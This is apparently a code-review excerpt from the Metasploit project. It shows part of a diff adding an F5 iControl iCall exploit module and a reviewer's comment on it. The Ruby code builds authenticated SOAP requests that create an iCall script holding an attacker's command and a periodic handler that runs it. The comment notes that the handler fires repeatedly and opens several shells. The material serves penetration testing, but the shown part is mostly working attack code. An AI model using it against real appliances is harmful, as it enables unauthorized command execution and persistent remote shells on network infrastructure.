modules/exploits/linux/http/f5_icall_cmd.rb

```diff
@@ -0,0 +1,256 @@
+  def build_xml
+    builder = Nokogiri::XML::Builder.new do |xml|
+      xml.Envelope do
+        xml = xml_add_namespaces(xml)
+        xml['soapenv'].Header
+        xml['soapenv'].Body do
+          yield xml
+        end
+      end
+    end
+    builder.to_xml
+  end
+
+  def xml_add_namespaces(xml)
+    ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
+    xml.doc.root.namespace = ns
+    xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
+    xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
+    xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
+    xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
+    xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
+    xml
+  end
+
+  def send_soap_request(pay)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    )
+    if res
+      return res
+    else
+      vprint_error('No response')
+    end
+    false
+  end
+
+  def create_script(name, cmd)
+    create_xml = build_xml do |xml|
+      xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item name
+        end
+        xml.definitions(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item cmd
+        end
+      end
+    end
+    send_soap_request(create_xml)
+  end
+
+  def delete_script(script_name)
+    delete_xml = build_xml do |xml|
+      xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item script_name
+        end
+      end
+    end
+    send_soap_request(delete_xml)
+  end
+
+  def script_exists(script_name)
+    exists_xml = build_xml do |xml|
+      xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
+    end
+    res = send_soap_request(exists_xml)
+    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
+  end
+
+  def create_handler(handler_name, script_name, interval)
+    handler_xml = build_xml do |xml|
+      xml['per'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.handlers(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item handler_name
+        end
+        xml.scripts(STRING_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item script_name
+        end
+        xml.intervals(LONG_ATTRS) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item interval
```

Comment:
In filing https://github.com/rapid7/metasploit-framework/issues/6256 and doing last minute cleanup of this module, I took at the docs for this API and noticed that `intervals` is just as it sounds -- the payload will execute every time this interval fires, which means more than one session.  I usually get one, but oftentimes get 2, and once I got *three* sessions.  I don't know what can be done about this, but there is a start and end  time that could be used, but that has the problem that you don't know what the time of the device is.  There is also the issue that setting an interval but without a start/end time seems to imply "run every <interval> seconds", but it actually runs immediately and more frequently than `INTERVAL` after that.  For example, I just set `INTERVAL` to 65 and got 8 shells.